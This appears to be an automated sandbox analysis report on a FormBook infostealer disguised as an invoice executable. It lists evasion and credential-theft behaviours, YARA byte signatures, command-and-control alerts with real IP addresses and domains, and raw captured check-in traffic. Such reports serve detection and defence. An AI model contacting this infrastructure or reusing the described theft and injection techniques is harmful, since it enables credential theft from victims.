Edit tour

Windows Analysis Report
FACTURA 24V70 VINS.exe

Overview

General Information

Sample name:	FACTURA 24V70 VINS.exe
Analysis ID:	1562313
MD5:	6e3917643d8c875e3f45c265b82cca9d
SHA1:	09163656f409eade7b892bd1e7ec8f9cdf045715
SHA256:	ddca7740e832942313e7bd03a5670bc03cb09d8113433826e252666eeda046ab
Tags:	exeuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

FACTURA 24V70 VINS.exe (PID: 5016 cmdline: "C:\Users\user\Desktop\FACTURA 24V70 VINS.exe" MD5: 6E3917643D8C875E3F45C265B82CCA9D)

FACTURA 24V70 VINS.exe (PID: 3384 cmdline: "C:\Users\user\Desktop\FACTURA 24V70 VINS.exe" MD5: 6E3917643D8C875E3F45C265B82CCA9D)

fXZvHKoWCzop.exe (PID: 5948 cmdline: "C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

cacls.exe (PID: 5900 cmdline: "C:\Windows\SysWOW64\cacls.exe" MD5: 00BAAE10C69DAD58F169A3ED638D6C59)

fXZvHKoWCzop.exe (PID: 3328 cmdline: "C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 6404 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.4650294834.0000000003580000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.4650294834.0000000003580000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bf50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1415f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.4650098497.0000000003530000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.4650098497.0000000003530000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bf50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1415f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000E.00000002.4648426160.0000000000880000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000E.00000002.4648426160.0000000000880000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x3b32c:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2353b:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bf50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1415f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.3039119542.0000000002F50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.3039119542.0000000002F50000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x175910:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x15db1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x175910:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x15db1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.3037420382.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.3037420382.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f323:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17532:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.3038070342.0000000001620000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.3038070342.0000000001620000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bf50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1415f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Process Memory Space: FACTURA 24V70 VINS.exe PID: 5016	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.FACTURA 24V70 VINS.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.FACTURA 24V70 VINS.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f323:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17532:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
3.2.FACTURA 24V70 VINS.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.FACTURA 24V70 VINS.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e523:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16732:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T13:56:22.160791+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49947	168.206.11.225	80	TCP
2024-11-25T13:56:37.529606+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50021	162.0.229.222	80	TCP
2024-11-25T13:56:52.702666+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50025	3.33.130.190	80	TCP
2024-11-25T13:57:15.953296+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50029	3.33.130.190	80	TCP
2024-11-25T13:57:31.418578+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50033	217.160.0.158	80	TCP
2024-11-25T13:57:47.239353+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50037	213.249.67.10	80	TCP
2024-11-25T13:58:03.037197+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50041	92.118.228.160	80	TCP
2024-11-25T13:58:17.837518+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50045	3.33.130.190	80	TCP
2024-11-25T13:58:33.808582+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50050	209.74.64.190	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T13:56:29.262803+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50004	162.0.229.222	80	TCP
2024-11-25T13:56:31.928607+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50010	162.0.229.222	80	TCP
2024-11-25T13:56:34.534090+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50018	162.0.229.222	80	TCP
2024-11-25T13:56:44.666849+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50022	3.33.130.190	80	TCP
2024-11-25T13:56:47.419669+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50023	3.33.130.190	80	TCP
2024-11-25T13:56:50.043557+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50024	3.33.130.190	80	TCP
2024-11-25T13:57:07.890800+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50026	3.33.130.190	80	TCP
2024-11-25T13:57:10.537361+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50027	3.33.130.190	80	TCP
2024-11-25T13:57:13.234526+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50028	3.33.130.190	80	TCP
2024-11-25T13:57:23.396085+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50030	217.160.0.158	80	TCP
2024-11-25T13:57:26.019326+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50031	217.160.0.158	80	TCP
2024-11-25T13:57:28.799181+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50032	217.160.0.158	80	TCP
2024-11-25T13:57:38.935760+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50034	213.249.67.10	80	TCP
2024-11-25T13:57:41.719099+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50035	213.249.67.10	80	TCP
2024-11-25T13:57:44.490880+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50036	213.249.67.10	80	TCP
2024-11-25T13:57:55.031888+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50038	92.118.228.160	80	TCP
2024-11-25T13:57:57.707338+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50039	92.118.228.160	80	TCP
2024-11-25T13:58:00.266676+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50040	92.118.228.160	80	TCP
2024-11-25T13:58:09.805444+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50042	3.33.130.190	80	TCP
2024-11-25T13:58:12.467990+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50043	3.33.130.190	80	TCP
2024-11-25T13:58:15.123168+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50044	3.33.130.190	80	TCP
2024-11-25T13:58:24.840722+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50047	209.74.64.190	80	TCP
2024-11-25T13:58:28.248991+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50048	209.74.64.190	80	TCP
2024-11-25T13:58:31.018039+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50049	209.74.64.190	80	TCP

HTTP traffic detected: POST /vt2q/ HTTP/1.1Host: www.nieuws-july202502.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateContent-Length: 210Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheOrigin: http://www.nieuws-july202502.sbsReferer: http://www.nieuws-july202502.sbs/vt2q/User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36Data Raw: 30 64 66 58 47 3d 41 63 41 32 30 73 45 39 45 7a 77 37 34 52 77 2f 6f 58 75 52 70 36 4a 79 55 65 56 68 39 58 77 52 45 4f 51 6f 65 70 39 74 79 70 48 6e 6e 48 79 45 54 77 50 46 6e 46 71 48 44 55 42 4d 37 62 71 75 69 41 57 48 74 48 55 35 6e 38 51 38 50 34 69 50 64 56 6f 78 52 65 41 33 37 65 70 76 62 72 64 34 4e 59 33 79 4a 42 41 30 61 43 7a 48 79 32 6f 54 61 48 69 67 53 55 4a 4f 4c 76 44 71 4f 4b 75 46 44 56 68 63 34 42 73 49 51 43 33 44 58 6c 7a 47 47 44 72 2f 6d 30 30 4e 4c 71 64 78 43 39 47 7a 41 68 56 58 48 58 41 58 70 44 55 4e 43 70 46 33 64 54 6f 67 61 34 38 42 6a 54 74 5a 61 59 52 64 68 65 39 7a 76 46 6c 4e 4c 7a 70 4e Data Ascii: 0dfXG=AcA20sE9Ezw74Rw/oXuRp6JyUeVh9XwREOQoep9typHnnHyETwPFnFqHDUBM7bquiAWHtHU5n8Q8P4iPdVoxReA37epvbrd4NY3yJBA0aCzHy2oTaHigSUJOLvDqOKuFDVhc4BsIQC3DXlzGGDr/m00NLqdxC9GzAhVXHXAXpDUNCpF3dToga48BjTtZaYRdhe9zvFlNLzpN

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 25 Nov 2024 12:56:29 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 25 Nov 2024 12:56:31 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 25 Nov 2024 12:56:34 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
